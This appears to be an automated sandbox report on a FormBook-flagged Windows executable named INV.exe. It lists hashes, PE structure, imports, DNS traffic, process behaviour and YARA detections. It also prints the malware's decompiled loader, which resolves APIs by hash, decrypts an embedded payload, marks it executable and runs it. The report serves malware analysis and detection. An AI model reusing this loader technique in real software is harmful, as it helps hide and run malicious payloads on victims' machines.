                                      SHA-256:2FBBA0C8E59A8B1D6C2DF616B250CD1796EA0C8291352FD71180DAE0773C0D75
                                      SHA-512:8A84D40FE755D451A4068FCE2671947792784CEAFB495A02F0EA1EA138F9D595234795AE7E98ED59A6B5B27E1024EEBE88802BBBF20E5F138D049D390B579BF9
                                      Malicious:false
                                      Reputation:low
                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.5.6.<./.P.i.d.>.......
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER14C9.tmp.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4533
                                      Entropy (8bit):4.456542350506463
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zspJgtWI9mYWSC8B/8fm8M4JA+ZFYN+q8Hxg7zqvJupd:uITf7hRSNKJn0NIe7mv4pd
                                      MD5:94519179BDCB8BA568890471088FD3B5
                                      SHA1:FBBE4BB0B25E7F99245025CC7673A4019A1A7353
                                      SHA-256:D9FB01E02CCD6D6A42DFB73A2FA94171952F440E6CD9553357F01A244CA6262E
                                      SHA-512:370ADE951BD152ACD84C37EF29F084691BB73061879123D7B6A422EE34EC7C5B6F50A78F7FF1A139181BF18AD1CC7D9E733ABC265260AC5B751B52BFE25629AD
                                      Malicious:false
                                      Reputation:low
                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="746536" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD26.tmp.dmp
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Fri Nov 27 01:06:07 2020, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):110238
                                      Entropy (8bit):3.479625234997686
                                      Encrypted:false
                                      SSDEEP:768:bgCe5gNbDqmyhZ303oHqUD8CQjPOWQaCgUziUHloTAZ1ExqaLQoKEequOED:7ttLS303oGFSNaCgUziUbEQuVuOED
                                      MD5:D14107A7F95EFA4361734C6926E9AA10
                                      SHA1:1D25716F92DCCD4330427C663874EE013F9AC6D2
                                      SHA-256:10C702BE8D1F96B759604E675FE55DBCD0DF5CC6D5A13FDC8F917024AD6B9168
                                      SHA-512:819011E98E92F19BB21F9FBED53A78BBBCB544D701A673CDB114656C47792BA4EEF067E93B429F041EECD895BEC3C980B88EBEE6B7BBF10B5F4AD4C9E1B7C6F1
                                      Malicious:false
                                      Reputation:low
                                      Preview: MDMP....... ........P._...................U...........B..............GenuineIntelW...........T.......(....P._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                      Entropy (8bit):7.734539190231703
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:INV.exe
                                      File size:394240
                                      MD5:83259cb82642666503278233421c306d
                                      SHA1:180e81bab341eda0d404b8f5fed93bc3b350cfbd
                                      SHA256:6e28207e7a3ef7f173d7a7905208a55ff0ad1eb645241e2e9ae453c643cf3a31
                                      SHA512:c5b2342cdd849a49b4e2472c563301aa3f69d192317901f13dd94db5ad680db7b6e529a6b23fd2528e6378a08f058ee06a9663c8539ce44655235fd241cdc5c7
                                      SSDEEP:6144:OKRY0sMhL5VwjYGFzVfPn1IqXJ7kELwepHTAXF3QOrIxc8V4rJH:OKBsM1whBPn1IWdkELLpHU1Xrmc8V4
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0Y.ecY.ecY.ec...c@.ec...cV.ec...c<.ec.S.cT.ecY.dc3.ecT..cX.ecT..cX.ecY..cX.ecT..cX.ecRichY.ec........................PE..L..

                                      File Icon

                                      Icon Hash:00828e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x40127b
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows cui
                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x5FC0322D [Thu Nov 26 22:54:37 2020 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:e5251995cfb2fe7a12656fff0fe17665

                                      Entrypoint Preview

                                      Instruction
                                      call 00007F2D98FF681Eh
                                      jmp 00007F2D98FF525Ah
                                      push ebp
                                      mov ebp, esp
                                      mov eax, dword ptr [ebp+08h]
                                      mov eax, dword ptr [eax]
                                      cmp dword ptr [eax], E06D7363h
                                      jne 00007F2D98FF5447h
                                      cmp dword ptr [eax+10h], 03h
                                      jne 00007F2D98FF5441h
                                      mov eax, dword ptr [eax+14h]
                                      cmp eax, 19930520h
                                      je 00007F2D98FF543Dh
                                      cmp eax, 19930521h
                                      je 00007F2D98FF5436h
                                      cmp eax, 19930522h
                                      je 00007F2D98FF542Fh
                                      cmp eax, 01994000h
                                      je 00007F2D98FF5428h
                                      xor eax, eax
                                      pop ebp
                                      retn 0004h
                                      call 00007F2D98FF6BBCh
                                      int3
                                      push 00401285h
                                      call 00007F2D98FF720Bh
                                      pop ecx
                                      xor eax, eax
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      call 00007F2D98FF575Eh
                                      mov esi, eax
                                      test esi, esi
                                      je 00007F2D98FF556Bh
                                      mov edx, dword ptr [esi+5Ch]
                                      mov ecx, edx
                                      push edi
                                      mov edi, dword ptr [ebp+08h]
                                      cmp dword ptr [ecx], edi
                                      je 00007F2D98FF542Fh
                                      add ecx, 0Ch
                                      lea eax, dword ptr [edx+00000090h]
                                      cmp ecx, eax
                                      jc 00007F2D98FF5411h
                                      lea eax, dword ptr [edx+00000090h]
                                      cmp ecx, eax
                                      jnc 00007F2D98FF5426h
                                      cmp dword ptr [ecx], edi
                                      je 00007F2D98FF5424h
                                      xor ecx, ecx
                                      test ecx, ecx
                                      je 00007F2D98FF5536h
                                      mov edx, dword ptr [ecx+08h]
                                      test edx, edx
                                      je 00007F2D98FF552Bh
                                      cmp edx, 05h
                                      jne 00007F2D98FF542Eh
                                      and dword ptr [ecx+08h], 00000000h
                                      xor eax, eax
                                      inc eax
                                      jmp 00007F2D98FF551Bh
                                      cmp edx, 01h
                                      jne 00007F2D98FF542Ah
                                      or eax, FFFFFFFFh
                                      jmp 00007F2D98FF550Eh

                                      Rich Headers

                                      Programming Language:
                                      • [RES] VS2013 build 21005
                                      • [LNK] VS2013 build 21005

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1d1240x8c.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x1e0.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x630000x130c.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1cc680x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x180000x1c0.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x16e9f0x17000False0.517747961957data6.61669655756IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rdata0x180000x5bb40x5c00False0.373259171196data4.5684318813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x1e0000x43b440x41e00False0.988499911053DOS executable (block device driver\377\377\200)7.98533790258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .rsrc0x620000x1e00x200False0.52734375data4.70436301348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x630000x130c0x1400False0.778515625data6.50096033347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_MANIFEST0x620600x17dXML 1.0 document textEnglishUnited States

                                      Imports

                                      DLLImport
                                      KERNEL32.dllEnumCalendarInfoExA, SetCalendarInfoW, VirtualProtect, CloseHandle, WriteConsoleW, SetFilePointerEx, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, lstrcpyA, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, HeapSize, GetStringTypeW, HeapReAlloc, HeapAlloc, WaitForSingleObjectEx, EnumCalendarInfoW, CreateDirectoryW, EnumSystemLocalesW, GlobalFix, OutputDebugStringW, RtlUnwind, LoadLibraryExW, FreeLibrary, GetCommandLineA, GetLastError, SetLastError, GetCurrentThread, GetCurrentThreadId, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, WriteFile, GetModuleFileNameW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, CreateEventW, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, CreateSemaphoreW, EnterCriticalSection, LeaveCriticalSection, FatalAppExitA, HeapFree, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, IsDebuggerPresent, IsProcessorFeaturePresent, SetConsoleCtrlHandler, CreateFileW
                                      MPR.dllWNetDisconnectDialog1W, WNetGetResourceParentW, WNetGetNetworkInformationW, WNetGetResourceInformationW, WNetAddConnection3A
                                      MSACM32.dllacmFilterTagEnumA, acmDriverEnum, acmFormatChooseW, acmStreamMessage, acmFilterEnumA, acmFormatEnumW, acmDriverDetailsW, acmFormatSuggest
                                      loadperf.dllLoadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA, LoadPerfCounterTextStringsA
                                      GDI32.dllUnrealizeObject, GetGlyphOutline, GetCharABCWidthsFloatW, GetNearestColor
                                      WINSPOOL.DRVStartDocPrinterW, SetPortW, DEVICECAPABILITIES

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Network Port Distribution

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 27, 2020 02:05:54.692982912 CET5585453192.168.2.48.8.8.8
                                      Nov 27, 2020 02:05:54.720194101 CET53558548.8.8.8192.168.2.4
                                      Nov 27, 2020 02:05:55.633140087 CET6454953192.168.2.48.8.8.8
                                      Nov 27, 2020 02:05:55.660248995 CET53645498.8.8.8192.168.2.4
                                      Nov 27, 2020 02:05:56.508723021 CET6315353192.168.2.48.8.8.8
                                      Nov 27, 2020 02:05:56.536097050 CET53631538.8.8.8192.168.2.4
                                      Nov 27, 2020 02:05:57.672020912 CET5299153192.168.2.48.8.8.8
                                      Nov 27, 2020 02:05:57.717303038 CET53529918.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:01.166337013 CET5370053192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:01.211952925 CET53537008.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:02.431898117 CET5172653192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:02.477114916 CET53517268.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:11.599971056 CET5679453192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:11.627115965 CET53567948.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:18.445962906 CET5653453192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:18.473351002 CET53565348.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:23.581319094 CET5662753192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:23.608694077 CET53566278.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:24.675609112 CET5662153192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:24.720957041 CET53566218.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:25.577539921 CET6311653192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:25.604675055 CET53631168.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:26.445909977 CET6407853192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:26.491342068 CET53640788.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:27.276896000 CET6480153192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:27.304073095 CET53648018.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:28.097887993 CET6172153192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:28.125070095 CET53617218.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:28.918909073 CET5125553192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:28.946232080 CET53512558.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:29.722603083 CET6152253192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:29.749654055 CET53615228.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:30.540760994 CET5233753192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:30.568002939 CET53523378.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:35.154489994 CET5504653192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:35.199733019 CET53550468.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:35.633502960 CET4961253192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:35.678972006 CET53496128.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:36.176018000 CET4928553192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:36.221518993 CET53492858.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:36.572947025 CET5060153192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:36.618227005 CET53506018.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:37.405683041 CET6087553192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:37.453906059 CET5644853192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:37.459347010 CET53608758.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:37.480974913 CET53564488.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:37.951503992 CET5917253192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:37.996998072 CET53591728.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:38.474426031 CET6242053192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:38.501616955 CET53624208.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:39.843559027 CET6057953192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:39.888915062 CET53605798.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:40.740267038 CET5018353192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:40.785589933 CET53501838.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:41.172720909 CET6153153192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:41.218246937 CET53615318.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:44.243426085 CET4922853192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:44.299596071 CET53492288.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:53.334465027 CET5979453192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:53.361748934 CET53597948.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:53.421722889 CET5591653192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:53.467124939 CET53559168.8.8.8192.168.2.4
                                      Nov 27, 2020 02:06:56.163362980 CET5275253192.168.2.48.8.8.8
                                      Nov 27, 2020 02:06:56.210628033 CET53527528.8.8.8192.168.2.4
                                      Nov 27, 2020 02:07:28.711581945 CET6054253192.168.2.48.8.8.8
                                      Nov 27, 2020 02:07:28.738723040 CET53605428.8.8.8192.168.2.4
                                      Nov 27, 2020 02:07:30.085612059 CET6068953192.168.2.48.8.8.8
                                      Nov 27, 2020 02:07:30.130929947 CET53606898.8.8.8192.168.2.4

                                      Code Manipulations

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      Analysis Process: INV.exe PID: 7140 Parent PID: 6016

                                      General

                                      Start time:02:05:59
                                      Start date:27/11/2020
                                      Path:C:\Users\user\Desktop\INV.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\INV.exe'
                                      Imagebase:0x1060000
                                      File size:394240 bytes
                                      MD5 hash:83259CB82642666503278233421C306D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: conhost.exe PID: 7148 Parent PID: 7140

                                      General

                                      Start time:02:05:59
                                      Start date:27/11/2020
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: INV.exe PID: 1740 Parent PID: 7140

                                      General

                                      Start time:02:06:00
                                      Start date:27/11/2020
                                      Path:C:\Users\user\Desktop\INV.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\Desktop\INV.exe
                                      Imagebase:0x1060000
                                      File size:394240 bytes
                                      MD5 hash:83259CB82642666503278233421C306D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: INV.exe PID: 6348 Parent PID: 7140

                                      General

                                      Start time:02:06:00
                                      Start date:27/11/2020
                                      Path:C:\Users\user\Desktop\INV.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\INV.exe
                                      Imagebase:0x1060000
                                      File size:394240 bytes
                                      MD5 hash:83259CB82642666503278233421C306D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: INV.exe PID: 2856 Parent PID: 6348

                                      General

                                      Start time:02:06:01
                                      Start date:27/11/2020
                                      Path:C:\Users\user\Desktop\INV.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\INV.exe
                                      Imagebase:0x1060000
                                      File size:394240 bytes
                                      MD5 hash:83259CB82642666503278233421C306D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: WerFault.exe PID: 1868 Parent PID: 2856

                                      General

                                      Start time:02:06:04
                                      Start date:27/11/2020
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 872
                                      Imagebase:0x9d0000
                                      File size:434592 bytes
                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      Chronological Activities

                                      Disassembly

                                      Code Analysis

                                      Reset < >

                                        Analysis Process: INV.exe PID: 7140 Parent PID: 6016 INV.exeCOMMON

                                        Executed Functions

                                        Function 01077800, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 113memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 38%
                                        			E01077800(void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				char _v18;
				short _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				short _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				intOrPtr* _t40;
				intOrPtr* _t43;
				void* _t44;
				intOrPtr* _t48;
				void* _t49;
				signed char _t50;
				intOrPtr* _t56;
				void* _t85;
				void* _t87;

				_v28 = 0x72657355;
				_v24 = 0x642e3233;
				_v20 = 0x6c6c;
				_v18 = 0;
				_v40 = 0x72637052;
				_v36 = 0x642e3474;
				_v32 = 0x6c6c;
				_v30 = 0;
				_t56 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
				_t12 =  &_v28; // 0x72657355
				_v8 = E01077950( *_t56(_t12, _t85, __esi, __ebx), 0xb4c47f55);
				_t40 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
				_t17 =  &_v28; // 0x72657355
				_t43 = E01077950( *_t56(_t17), 0xc7e6f44f);
				_t44 =  *_t40(0); // executed
				 *_t43(_t44);
				_t18 =  &_v40; // 0x72637052
				_t48 = E01077950( *_t56(_t18), 0x958d1c17);
				_t49 =  *_t48(2, 0, 1, 0,  &_v12); // executed
				_t87 = 0;
				if(_t49 != 0 && _t49 == 0x57) {
					_t50 = 0;
					do {
						_t20 = 0x107f0d0 + _t50; // 0x17e1e9
						asm("rol dl, 0x2");
						asm("ror dl, 0x3");
						 *(0x107f0d0 + _t50) = (_t50 + _t50 - ((( ~( !( *_t20) ^ 0x00000097) - 0x00000027 ^ _t50) - _t50 ^ _t50) - 0x00000060 ^ _t50) ^ _t50) - 0x00000052 ^ _t50;
						_t50 = _t50 + 1;
					} while (_t50 < 0x1e05);
					VirtualProtect(0x107f0d0, 0x1e05, 0x40,  &_v16); // executed
					CallWindowProcW(0x107f0d0, 0x1080ed8, 0, 0, 0);
					return E01077D10(_t87);
				}
				return _t49;
			}
























                                        0x01077809
                                        0x01077810
                                        0x01077817
                                        0x0107781d
                                        0x01077821
                                        0x01077828
                                        0x0107782f
                                        0x01077835
                                        0x01077858
                                        0x0107785a
                                        0x0107786c
                                        0x01077889
                                        0x01077890
                                        0x0107789d
                                        0x010778a6
                                        0x010778a9
                                        0x010778ab
                                        0x010778b8
                                        0x010778cb
                                        0x010778cd
                                        0x010778d2
                                        0x010778d9
                                        0x010778e0
                                        0x010778e0
                                        0x010778ec
                                        0x010778f4
                                        0x0107790e
                                        0x01077914
                                        0x01077915
                                        0x0107792c
                                        0x01077942
                                        0x00000000
                                        0x01077945
                                        0x0107794d

                                        APIs
                                        • GetConsoleWindow.KERNELBASE(00000000), ref: 010778A6
                                        • RpcMgmtEpEltInqBegin.RPCRT4(00000000,00000002,00000000,00000001,00000000,?), ref: 010778CB
                                        • VirtualProtect.KERNELBASE(0107F0D0,00001E05,00000040,?), ref: 0107792C
